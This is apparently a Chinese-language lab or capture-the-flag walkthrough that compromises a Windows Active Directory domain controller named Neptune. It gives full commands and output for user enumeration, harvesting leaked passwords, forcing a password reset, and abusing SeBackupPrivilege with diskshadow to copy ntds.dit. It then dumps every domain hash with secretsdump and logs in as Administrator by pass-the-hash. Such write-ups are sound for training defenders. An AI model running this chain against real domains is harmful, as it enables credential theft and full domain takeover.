信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.56.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100  08:00:27:3c:5c:5a       PCS Systemtechnik GmbH
192.168.56.118  0a:00:27:00:00:0e       (Unknown: locally administered)

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.125 seconds (120.47 hosts/sec). 2 responded
❯ export ip=192.168.56.118
❯ nmap -sS -sV -p- -A $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-14 16:11 CST
Nmap scan report for 192.168.56.10
Host is up (0.00050s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title:  Neptune
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-14 08:13:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: neptune.thl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
55182/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
55183/tcp open  msrpc         Microsoft Windows RPC
55193/tcp open  msrpc         Microsoft Windows RPC
55202/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:6A:38:CB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6a:38:cb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-03-14T08:14:24
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms 192.168.56.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.49 seconds

一般而言windows靶机都存在很多端口

根据ldap协议获取到域名neptune.thl

添加进hosts

1
2
3

❯ echo "$ip neptune.thl"|sudo tee -a /etc/hosts
[sudo] password for Pepster:
192.168.56.10 neptune.thl

枚举一下80端口存在的目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.10
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 25680]
/images               (Status: 301) [Size: 151] [--> http://192.168.56.10/images/]
/contact.html         (Status: 200) [Size: 9313]
/about.html           (Status: 200) [Size: 8948]
/docs                 (Status: 301) [Size: 149] [--> http://192.168.56.10/docs/]
/Images               (Status: 301) [Size: 151] [--> http://192.168.56.10/Images/]
/service.html         (Status: 200) [Size: 12848]
/css                  (Status: 301) [Size: 148] [--> http://192.168.56.10/css/]
/Contact.html         (Status: 200) [Size: 9313]
/About.html           (Status: 200) [Size: 8948]
/Index.html           (Status: 200) [Size: 25680]
/js                   (Status: 301) [Size: 147] [--> http://192.168.56.10/js/]
Progress: 7772 / 1102800 (0.70%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 8243 / 1102800 (0.75%)
===============================================================
Finished
===============================================================

利用kerbrute尝试枚举ldap协议下的用户名

爆不出来

❯ kerbrute_linux_amd64 userenum -d neptune.thl --dc 192.168.56.10 /usr/share/seclists/Usernames/Names/names.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                 

Version: v1.0.3 (9dad6e1) - 03/14/25 - Ronnie Flathers @ropnop

2025/03/14 16:50:30 >  Using KDC(s):
2025/03/14 16:50:30 >   192.168.56.10:88

2025/03/14 16:50:33 >  Done! Tested 10177 usernames (0 valid) in 3.498 seconds

PDF文件枚举

我们在首页中可以发现存在企业的相关文档

并且跳转到/docs目录下，命名比较规范

2024-02-15.pdf以年月日来命名

所以可以尝试枚举其他日期的pdf文件

写个脚本，从23年至今的全部pdf都下载下来

❯ curr_date="2023-01-01"; end_date="2025-03-14"; while [[ "$curr_date" != "$end_date" ]]; do echo "${curr_date}.pdf"; wget "$ip/docs/${curr_date}.pdf"; curr_date=$(date -d "$curr_date +1 day" "+%Y-%m-%d"); done

利用exiftools分析pdf的Creator

得知每个pdf的创建者都不同

❯ exiftool 2024-01-01.pdf
ExifTool Version Number         : 13.10
File Name                       : 2024-01-01.pdf
Directory                       : .
File Size                       : 50 kB
File Modification Date/Time     : 2025:02:27 23:10:38+08:00
File Access Date/Time           : 2025:03:14 16:58:36+08:00
File Inode Change Date/Time     : 2025:03:14 16:58:36+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.3
Linearized                      : No
Author                          : Neptune Oil & Gas
Create Date                     : 2025:02:27 12:10:36-03:00
Creator                         : Mary.Johnson
Modify Date                     : 2025:02:27 12:10:36-03:00
Producer                        : ReportLab PDF Library - www.reportlab.com
Subject                         : Informe sobre sostenibilidad y reducción de emisiones de CO2
Title                           : Reporte 2024-01-01
Trapped                         : False
Page Mode                       : UseNone
Page Count                      : 20

批量读取创建者的用户名

❯ exiftool -Creator *.pdf|grep -v "===="|awk '{print $3}'|sort|uniq>user.txt
Warning: Invalid xref table - 2024-05-01.pdf
❯ head user.txt
Elizabeth.Davis
Elizabeth.Garcia
Elizabeth.Johnson
Elizabeth.Jones
Elizabeth.Miller
Elizabeth.Smith
Elizabeth.Wilson
files
James.Brown
James.Davis

再次枚举用户名

得到Lucas.Miller用户

❯ kerbrute_linux_amd64 userenum -d neptune.thl --dc 192.168.56.10 user.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/14/25 - Ronnie Flathers @ropnop

2025/03/14 17:13:50 >  Using KDC(s):
2025/03/14 17:13:50 >   192.168.56.10:88

2025/03/14 17:13:50 >  [+] VALID USERNAME:       [email protected]
2025/03/14 17:13:50 >  Done! Tested 62 usernames (1 valid) in 0.047 seconds

查找含有Lucas.Miller用户内容的pdf文件

发现在2023-01-12.pdf中包含Lucas.Miller用户的密码E@6q%TnR7UEQSXywr8^@

1
2
3

❯ pdfgrep  -i 'Lucas.Miller' *.pdf
2023-01-12.pdf:Estimado Lucas Miller,
2023-01-12.pdf:   ● Nombre de usuario (Usuario AD): [email protected]

AD域信息收集

拿到用户凭证后，利用netexec收集BloodHound所需的信息

Bloodhound Ingestor | NetExec

❯ netexec ldap $ip -u Lucas.Miller -p  E@6q%TnR7UEQSXywr8^@ --bloodhound -c All -d neptune.thl --dns-server $ip
SMB         192.168.56.10   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    DC01             [+] neptune.thl\Lucas.Miller:E@6q%TnR7UEQSXywr8^@
LDAP        192.168.56.10   389    DC01             Resolved collection methods: container, rdp, acl, psremote, session, objectprops, dcom, group, trusts, localadmin
LDAP        192.168.56.10   389    DC01             Done in 00M 00S
LDAP        192.168.56.10   389    DC01             Compressing output into /home/Pepster/.nxc/logs/DC01_192.168.56.10_2025-03-14_194910_bloodhound.zip

根据收集到的Active Directory域信息

导入BloodHound GUI

利用rpcclient尝试枚举域内其他用户，发现victor.rodriguez用户在描述中藏有密码H5gVCzzZkzJ#wGsT8u1$

❯ rpcclient -U "Lucas.Miller%E@6q%TnR7UEQSXywr8^@" $ip
rpcclient $> querydispinfo
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfb5 RID: 0x453 acb: 0x00000210 Account: emma.johnson   Name: Emma Johnson      Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xf11 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0xfb3 RID: 0x451 acb: 0x00000210 Account: lucas.miller   Name: Lucas Miller      Desc: (null)
index: 0xfb6 RID: 0x454 acb: 0x00000210 Account: thomas.brown   Name: Thomas Brown      Desc: (null)
index: 0xfb4 RID: 0x452 acb: 0x00000210 Account: victor.rodriguez       Name: Victor Rodriguez  Desc: My Password is H5gVCzzZkzJ#wGsT8u1$

同时发现victor.rodriguez用户隶属于IT工作组

密码泄露

尝试利用smbclient连接一下，下载Scripts文件夹中的脚本文件

发现backup.ps1文件中含有用户凭证emma.johnson:sb9TVndq8N@tUVMmP2@#

❯ smbclient -U 'neptune.thl/victor.rodriguez%H5gVCzzZkzJ#wGsT8u1$' //192.168.56.10/IT
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Feb 27 08:14:40 2025
  ..                                DHS        0  Fri Feb 28 03:52:00 2025
  Scripts                             D        0  Thu Feb 27 08:16:55 2025

                10540543 blocks of size 4096. 7042590 blocks available
smb: \> cd Scripts\
smb: \Scripts\> ls
  .                                   D        0  Thu Feb 27 08:16:55 2025
  ..                                  D        0  Thu Feb 27 08:14:40 2025
  backup.ps1                          A     1957  Thu Feb 27 08:20:11 2025

                10540543 blocks of size 4096. 7042590 blocks available
smb: \Scripts\> get backup.ps1
getting file \Scripts\backup.ps1 of size 1957 as backup.ps1 (273.0 KiloBytes/sec) (average 273.0 KiloBytes/sec)
smb: \Scripts\> exit
❯ cat backup.ps1
$sourceDirectory = "C:\Confidenciales"
$destinationDirectory = "E:\Backups\Confidenciales"

$username = "emma.johnson"
$password = ConvertTo-SecureString "sb9TVndq8N@tUVMmP2@#" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

$emailFrom = "[email protected]"
$emailTo = "[email protected]"
$smtpServer = "smtp.neptune.thl"
$smtpPort = 587
$emailSubject = "Notificación de Backup Completo"

$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "report_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName

function Send-EmailNotification {
    param (
        [string]$subject,
        [string]$body
    )
    try {
        $smtpClient = New-Object System.Net.Mail.SmtpClient($smtpServer, $smtpPort)
        $smtpClient.EnableSsl = $true
        $smtpClient.Credentials = New-Object System.Net.NetworkCredential("smtp_user", "smtp_password")

        $mailMessage = New-Object System.Net.Mail.MailMessage($emailFrom, $emailTo, $subject, $body)
        $smtpClient.Send($mailMessage)
        Write-Host "Correo enviado a $emailTo"
    }
    catch {
        Write-Host "Error al enviar el correo: $_"
    }
}

try {
    Write-Host "Iniciando el backup..."
    Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
    Write-Host "Backup completado exitosamente. Archivo guardado en: $backupFilePath"

    $emailBody = "El proceso de backup se ha completado correctamente." + "`n" + "Archivo de backup: $backupFilePath"

    Send-EmailNotification -subject $emailSubject -body $emailBody
}
catch {
    Write-Host "Error al realizar el backup: $_"

    $errorSubject = "Error en el proceso de Backup"
    $errorBody = "Hubo un problema al realizar el backup." + "`n" + "Error: $_"
    Send-EmailNotification -subject $errorSubject -body $errorBody
}%

利用此凭证再次收集一下信息，依次枚举一下存在的服务

发现可以利用WinRM 远程执行命令

❯ netexec smb $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
SMB         192.168.56.10   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.10   445    DC01             [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@#
❯ netexec winrm $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
WINRM       192.168.56.10   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:neptune.thl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.10   5985   DC01             [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@# (Pwn3d!)
❯ netexec ldap $ip -u emma.johnson -p sb9TVndq8N@tUVMmP2@#
SMB         192.168.56.10   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    DC01             [+] neptune.thl\emma.johnson:sb9TVndq8N@tUVMmP2@#

`Change password` 权限

这里需要重装一下靶机，否则不会出现Forec Change password权限

再次查看bloodhound，可以发现用户emma.johnson拥有可以强制修改THOMAS.BROWN用户密码的权限

尝试将THOMAS.BROWN密码改成P@ssw0rd

发现也可以利用winrm执行命令

❯ net rpc password "thomas.brown" "P@ssw0rd" -U neptune.thl/emma.johnson%'sb9TVndq8N@tUVMmP2@#' -S dc01.neptune.thl
❯ netexec ldap $ip -u THOMAS.BROWN -p P@ssw0rd
SMB         192.168.56.10   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
LDAP        192.168.56.10   389    DC01             [+] neptune.thl\THOMAS.BROWN:P@ssw0rd (Pwn3d!)
❯ netexec smb $ip -u THOMAS.BROWN -p P@ssw0rd
SMB         192.168.56.10   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:neptune.thl) (signing:True) (SMBv1:False)
SMB         192.168.56.10   445    DC01             [+] neptune.thl\THOMAS.BROWN:P@ssw0rd
❯ netexec winrm $ip -u THOMAS.BROWN -p P@ssw0rd
WINRM       192.168.56.10   5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:neptune.thl)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.56.10   5985   DC01             [+] neptune.thl\THOMAS.BROWN:P@ssw0rd (Pwn3d!)

用户提权

尝试利用evil-winrm执行sehll命令

❯ evil-winrm -i $ip -u thomas.brown -p P@ssw0rd

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\thomas.brown\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\thomas.brown\Documents>

SeMachineAccountPrivilege：允许用户将工作站添加到域中。（已启用）

SeBackupPrivilege：允许用户备份文件和目录，覆盖文件和目录权限。（已启用）

SeRestorePrivilege：允许用户恢复文件和目录，覆盖文件和目录权限。（已启用）

SeShutdownPrivilege：允许用户关闭系统。（已启用）

SeChangeNotifyPrivilege：允许用户绕过遍历检查。（已启用）

SeIncreaseWorkingSetPrivilege：允许用户增加进程的工作集。（已启用）

Diskshadow 卷影副本

可以将priv理解为更加细化的linux sudo权限

其中SeBackupPrivilege可以类比为sudo cat /etc/shadow（绕过权限读取敏感文件）

Abusing Tokens - HackTricks

gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.

利用一下，可以读取管理员的密码hash

先找一个可写的目录，编辑一下diskshadow的命令文件

依次写入命令

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "set context persistent nowriters" | out-file ./tmp.txt -encoding ascii
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "set metadata C:\\Windows\\Temp\\meta.cab" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "add volume c: alias temp" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "create" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> echo "expose %temp% H:" | out-file ./tmp.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> type tmp.txt
set context persistent nowriters
set metadata C:\\Windows\\Temp\\meta.cab
add volume c: alias temp
create
expose %temp% H:

set context persistent nowriters：此命令可能用于设置持久性卷影副本的上下文，并指定不涉及任何编写器（可能会更改卷的组件）。

set metadata C:\Windows\Temp\meta.cab：此命令将元数据存储位置设置为指定的文件路径。

add volume c: alias temp：此命令添加卷 C: 并将其别名设置为 temp。

create：此命令使用指定的上下文和元数据设置创建新的卷影副本。

**expose %temp% H:**：此命令将别名为 temp 的卷影副本显示为新的驱动器 H:

尝试执行一下

这样就创建了一个H盘为C盘的卷影副本

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> diskshadow /s tmp.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  3/14/2025 11:17:00 AM

-> set context persistent nowriters
-> set metadata C:\\Windows\\Temp\\meta.cab
-> add volume c: alias temp
-> create
Alias temp for shadow ID {c2c62242-80f6-43ff-92d8-6979df11e1c2} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {0da2ca2d-ba81-4bd9-946e-c6681f8411a2} set as environment variable.

Querying all shadow copies with the shadow copy set ID {0da2ca2d-ba81-4bd9-946e-c6681f8411a2}

        * Shadow copy ID = {c2c62242-80f6-43ff-92d8-6979df11e1c2}               %temp%
                - Shadow copy set: {0da2ca2d-ba81-4bd9-946e-c6681f8411a2}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{c2f9909f-0000-0000-0000-100000000000}\ [C:\]
                - Creation time: 3/14/2025 11:17:00 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                - Originating machine: DC01.neptune.thl
                - Service machine: DC01.neptune.thl
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% H:
-> %temp% = {c2c62242-80f6-43ff-92d8-6979df11e1c2}
The shadow copy was successfully exposed as H:\.
->

diskshadow 是 Windows 自带的命令行工具，用于管理 卷影复制（VSS, Volume Shadow Copy Service）。它主要用于创建、删除和恢复卷影副本（Shadow Copies），并且常被用于 备份、取证分析、提权和数据恢复。

尝试上传dll

giuliano108/SeBackupPrivilege：使用 SE_BACKUP_NAME/SeBackupPrivilege 访问您不应该访问的对象

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> upload /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

Info: Uploading /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\Users\thomas.brown\Desktop\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> upload /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll

Info: Uploading /home/Pepster/thl/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\Users\thomas.brown\Desktop\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> ls


    Directory: C:\Users\thomas.brown\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/14/2025  11:20 AM          12288 SeBackupPrivilegeCmdLets.dll
-a----         3/14/2025  11:20 AM          16384 SeBackupPrivilegeUtils.dll
-a----         3/14/2025  11:14 AM            128 tmp.txt

如果你不利用此dll工具，直接复制则会复制失败

因为ntds.dit是被锁定的数据库文件

由lsass.exe 进程 实时锁定，以确保数据完整性

即使你在卷影副本VSS中，也会复制失败

进程锁定导致 文件占用
NTFS ACL 限制访问权限
继承了原本 C 盘的 NTFS ACL 访问控制

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> copy H:\Windows\NTDS\ntds.dit C:\Temp\
Access to the path 'H:\Windows\NTDS\ntds.dit' is denied.
At line:1 char:1
+ copy H:\Windows\NTDS\ntds.dit C:\Temp\
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (H:\Windows\NTDS\ntds.dit:FileInfo) [Copy-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

所以需要上传dll并且导入

1 2	Evil-WinRM PS C:\Users\thomas.brown\Desktop> import-module .\SeBackupPrivilegeCmdLets.dll Evil-WinRM PS C:\Users\thomas.brown\Desktop> import-module .\SeBackupPrivilegeUtils.dll

SeBackupPrivilegeUtils.dll：用于启用 SeBackupPrivilege 和 SeRestorePrivilege。

SeBackupPrivilegeCmdLets.dll：提供 Copy-FileSeBackupPrivilege 等命令，使你能绕过 NTFS ACL 限制并复制受保护文件（如 ntds.dit）。

将 Active Directory 数据库 SYSTEM拷贝到当前目录

1
2

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit .\NTDS
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM .\SYSTEM

下载到本地

*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> download NTDS

Info: Downloading C:\Users\thomas.brown\Desktop\NTDS to NTDS

Info: Download successful!
*Evil-WinRM* PS C:\Users\thomas.brown\Desktop> download SYSTEM

Info: Downloading C:\Users\thomas.brown\Desktop\SYSTEM to SYSTEM

Info: Download successful!

Administrator 用户提权

利用impacket工具包中的secretsdump提取NTLM 哈希

得到用户Administrator的hash 3a79fceda1024c1344c493c1f6e4c6c0

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds NTDS
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x9a6eda47674d4ed68313ddc1c8f9ca5b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 5e8a0e9e33e9b3e49f0767e39f3e7d29
[*] Reading and decrypting hashes from NTDS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3a79fceda1024c1344c493c1f6e4c6c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1001:aad3b435b51404eeaad3b435b51404ee:0e0e9e9b2d198f0988bb046450ae8197:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cdf274ce9ec9f879a8628fb04fec328d:::
neptune.thl\lucas.miller:1105:aad3b435b51404eeaad3b435b51404ee:56154d1fd4584ab98e61ea03f04e3a5c:::
neptune.thl\victor.rodriguez:1106:aad3b435b51404eeaad3b435b51404ee:8db2402812596e4ee8de3cfd342080cb:::
neptune.thl\emma.johnson:1107:aad3b435b51404eeaad3b435b51404ee:f08cf9706d0cd39f0724d4d77a43ef20:::
neptune.thl\thomas.brown:1108:aad3b435b51404eeaad3b435b51404ee:a97af7a0313e8f11f6a6f8b3916c6570:::
[*] Kerberos keys from NTDS
Administrator:aes256-cts-hmac-sha1-96:0642f2a9f255f8e6bfb9cd827e0897605d6fe9324d3fda7ca7ce41e4ca2a00a2
Administrator:aes128-cts-hmac-sha1-96:88e7d25adb8ae1ca38cf476306cc32e7
Administrator:des-cbc-md5:5e469161b5b52adf
DC01$:aes256-cts-hmac-sha1-96:6f3f7f3cc6992fcf1d2336d4a4ec82b11a8318a664a48abd64c72a12760312be
DC01$:aes128-cts-hmac-sha1-96:49bb4efcce6f8fe2871043cb2dccba50
DC01$:des-cbc-md5:9d34e5d9e9b0973d
krbtgt:aes256-cts-hmac-sha1-96:8185b80ffe2ac9852ff781f177829871396e7a9d1b9573229a7103c85fa94591
krbtgt:aes128-cts-hmac-sha1-96:c704596e73d5132b8c0d4eda9623bd8a
krbtgt:des-cbc-md5:7f23a49d3d94feae
neptune.thl\lucas.miller:aes256-cts-hmac-sha1-96:fef49d0e477adde08160ee2fb46a3f09fafec3eb4086098ae289e703db1b29a1
neptune.thl\lucas.miller:aes128-cts-hmac-sha1-96:9d773ecedad0dd144d366d07cbdb8fd8
neptune.thl\lucas.miller:des-cbc-md5:d01ab9ef2c8a13f2
neptune.thl\victor.rodriguez:aes256-cts-hmac-sha1-96:53da4cfdece959fed22f2485555b0b8ae5d2dc442c307a5a8e537a03be0622a9
neptune.thl\victor.rodriguez:aes128-cts-hmac-sha1-96:7d6304d35d89975bd0425b986e2405a2
neptune.thl\victor.rodriguez:des-cbc-md5:ea6efd6ecb803d9b
neptune.thl\emma.johnson:aes256-cts-hmac-sha1-96:228e7f3e7d8b1d7aa7d989df37fb5ca70672076c5e2691ee0724b2b99fa02a6e
neptune.thl\emma.johnson:aes128-cts-hmac-sha1-96:7bbfc3c1d6a07a367ad76204d92fb7cd
neptune.thl\emma.johnson:des-cbc-md5:9197b3b0518aea89
neptune.thl\thomas.brown:aes256-cts-hmac-sha1-96:1186489678902eb9afbe7f4637f650ea419f7965dc242d431ea3414169c96ef8
neptune.thl\thomas.brown:aes128-cts-hmac-sha1-96:a5cd3863dd9652fbfbe8891dcc46d02f
neptune.thl\thomas.brown:des-cbc-md5:5ed0cb83104aa2e3
[*] Cleaning up...

不用破解hash获得密码，直接利用hash登录即可

❯ evil-winrm -i $ip -u Administrator -H 3a79fceda1024c1344c493c1f6e4c6c0

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/26/2025   8:52 PM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cb067ebf9847990f92f49c0612ef56b6
*Evil-WinRM* PS C:\Users> cd 'Emma Johnson/Desktop'
*Evil-WinRM* PS C:\Users\Emma Johnson\Desktop> type user.txt
a5accd70ea911b92487cea1d1cb73162

如果你的kali无法联网，可以不下载dll文件

利用robocopy /B命令复制文件，效果也是一样的

1 2	Evil-WinRM PS C:\Users\thomas.brown\Desktop> robocopy H:\Windows\System32\config .\ SYSTEM /B Evil-WinRM PS C:\Users\thomas.brown\Desktop> robocopy H:\Windows\NTDS\ .\ NTDS.dit /B